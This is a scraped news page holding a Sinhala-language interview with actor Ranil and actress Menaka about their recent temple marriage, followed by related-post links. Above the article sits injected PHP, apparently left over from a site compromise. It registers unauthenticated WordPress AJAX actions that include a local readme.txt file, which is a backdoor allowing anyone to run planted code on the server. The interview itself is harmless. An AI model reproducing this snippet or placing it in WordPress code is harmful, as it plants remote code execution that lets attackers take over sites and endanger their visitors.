if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } මම ගත්තු තීරණය හරියටම හරි - රනිල් මට හොද බිරිඳක්‌ වෙන්න පුළුවන්... - මේනකා - mediahumanrights.lk
mediahumanrights.lk
Entertainment Entertainment News News

මම ගත්තු තීරණය හරියටම හරි – රනිල් මට හොද බිරිඳක්‌ වෙන්න පුළුවන්… – මේනකා

රනිල්
සද්ද බද්ද නැතුවම කසාද බැන්ද නේද?
ඇත්තටම සද්ද කරන්න වෙලාවක්‌ තිබුණෙ නෑ. අපි විවාහ වෙන්න තීරණය කරගෙන හිටියෙ ලබන අවුරුද්දෙ. ඒත් පවුල් දෙකේ වැඩිහිටියෝ අපේ හඳහන්වලට අනුව පහුගිය පළමු වැනිදාට හොඳ නැකතක්‌ තියෙනවා කියලා අපේ විවාහය ලියාපදිංචි කරන්න ලෑස්‌ති කළා. ඒකයි වුණේ.
මේ කටයුත්ත පන්සලක සිදු කළේ ජනප්‍රිය වෙන්න හිතාගෙන නේද?
කොහෙත්ම නෑ. අපි දෙන්නට විවිධ ආගම්වල යාළුවො ගොඩක්‌ ඉන්නවා. ඒ අය විවාහ වෙද්දි තමන්ගේ ආගම මුල්කර ගන්නවා අපි ඕන තරම් දැකලා තියෙනවා. ඉතින් අපිටත් හිතුණ මේ හොඳ දවසෙ අපේ ආගමේ ආශිර්වාදය අනුව විවාහය ගිවිස ගත්තොත් හොඳයි කියලා. ඒකයි ගම්පහ පිළිකුත්තුව පුරාණ රාජමහා විහාරයේදී ඒ කටයුතු සිදු කළේ.
විවාහය සම්බන්ධයෙන් ගත්තු තීරණේ හරියටම හරි කියලා හිතනවද?
එහෙම නොහිතුවනම් මේ දේ මම කරන්නෙ නෑනෙ. විවාහය සම්බන්ධයෙන් මම ගත්තු තීරණේ හරියටම හරි.
ක්‍ෂේත්‍රයේ අයට නොකිව්වෙ ඇයි?
ක්‍ෂේත්‍රයේ අයටත් ඥාතීන්ටත් වෙඩින් එක කියනවා. මේකට සහභාගි වුණේ ඇත්තටම අපේ පවුල් දෙකේ වැඩිහිටියෝ විතරයි.
තම ටිකත් තනිකඩව විනෝදෙන් හිටිය නම් හොඳයි කියලා හිතෙන්නෙ නැද්ද?
තනිකඩව හිටියත් මම ගෙවන්නෙ මගේ ජීවිතේ. කසාදයක්‌ කරගත්තත් ඒක එහෙමමයි. හැමදාම තනිකඩව ඉන්න බෑනෙ. වෙලාව ආවා හරි කෙනා හමුවුණා. මම හිතන්නෙ දැන් මම හිටියට වඩා විනෝදෙන් ඉන්නවා කියලයි.
හැබැයි ඉදිරියේදී නිළියන් එක්‌ක වැඩ කරන්න බැරි වෙයි නේද?
එහෙම වෙන්නෙ නෑ. මොකද අපිට අපි ගැන හොඳ අවබෝධයක්‌ වගේම විශ්වාසයක්‌ තියනවා. මේ කතා කරන වෙලාවෙ මම ගාල්ලෙ වැඩක ඉන්නෙ. මේනකා බණ්‌ඩාරගම.
හැම චරිතයක්‌ම සාර්ථකව නිරූපණය කරන ඔබේ සැබෑ ජීවිතේ සැමියාගේ චරිතය මොනවගේ වෙයිද
ඒකත් මම ජීවිතේ තියෙනකම් සාර්ථකව රඟපානවා. විශේෂයකට තියෙන්නෙ ෂූටින් නැතුව රඟපෑම විතරයි. මේනකාට අවශ්‍ය ආදරේ රැකවරණය වගේම සැමියෙකුගෙන් විය යුතු යුතුකම් මම හොඳින්ම ඉටු කරනවා.
මේනකා
කොහොමද මේනකා අලුත් ජීවිතේ
මගේ ජීවිතේ කවදත් හොඳයි. ඒකට රනිල් එකතු වුණා. ඉදිරියේදී මගේ ජීවිතේ තවත් ලස්‌සන වෙනවා කියන එක මම දන්නවා. ඒ රනිල් වගේ මට ආදරය කරන මාව තේරුම් ගත්තු කෙනෙකුගෙ සහකාරිය වීමේ වාසනාව මට හිමි වුණ නිසා.
ඉදිරියේදී නිර්මාණවලට ආරාධනා ලැබෙද්දි ඒ සඳහා රනිල්ටත් ආරාධනා ලැබිය යුතුයි කියලා මේනකා හිතනවද?
අනේ නෑ. මම කලාවයි පෞද්ගලික ජීවිතෙයි පටලවා ගන්න තරම් බොළඳ චරිතයක්‌ නෙමෙයි. මම ලැබෙන ආරාධනා මම භාර ගන්නවා. රනිල්ට ලැබෙන ඒවා එයා භාර ගනියි. හැබැයි මොනයම් හෝ නිර්මාණෙකට අපි දෙන්නටම ආරාධනා ලැබුණොත් ඒක ගොඩක්‌ සතුටින් භාර ගන්නවා.
විවාහයත් එක්‌ක රංගන කටයුතුවල හෝ නර්තන කටයුතුවල වෙනසක්‌ වේවිද?
විවාහය කියන්නෙ අපේ ජීවිතේට සහකාරියක්‌ හෝ සහකරුවෙක්‌ සොයා ගැනීමනෙ. එහෙම හොයා ගත්තා කියලා අපේ රැකියාව අපි වෙනස්‌ කරන්නෙ නෑනෙ. ඉතින් මමත් මේ දේවල්වල වෙනසක්‌ කරන්නෙ නෑ. රනිල් මගේ ජීවිතේට සම්බන්ධ වුණා කියන්නෙ මට ඒ දේවල් තව තවත් දියුණු කරගන්න පුළුවන් කියන එකයි.
විවාහ උත්සවේ ළඟදීම ගන්නවද?
නෑ. අපි විවාහ උත්සවේ ගන්න තීරණ කරලා තියෙන්නෙ ලබන අවුරුද්දෙ
රනිල්ට හොඳ බිරිඳක්‌ වෙන්න මේනකාට පුළුවන් වෙයිද?
අනිවාර්යයෙන්ම රනිල්ගෙ සිතුම් පැතුම් තේරුම් අරන් ඉන්න මට එයාට හොඳ බිරිඳක්‌ වෙන්න පුළුවන්. ඉදිරියේදී බිරිඳකගෙන් සැමියෙකුට විය යුතු සියලුම යුතුකම් ඉටු කරමින් රනිල්ගෙ අම්මවත් ආදරෙන් බලාගෙන ඉන්න මම බැඳිලා ඉන්නවා කියලයි මම හැම වෙලාවෙම හිතන්නෙ.
(දිනමිණ පුවත්පත ඇසුරෙනි)

Related posts

බසයේ පසුපස රෝදයට යටවි යතුරු පැදියේ ගමන් ගත් දෙදරු පියා ජිවිතක්ෂයට…

Shiran Viraj

අළුත්ගම කන්දේවිහාරය ජලයෙන් යටවෙයි – දිස්ත්‍රික් රැසක අනතුරු ඇඟවීම් පිටවෙයි -VIDEO

Shiran Viraj

ඒකාබද්ධ විපක්ෂය පාර්ලිමේන්තුවේ සටනක් අරඹයි

Shiran Viraj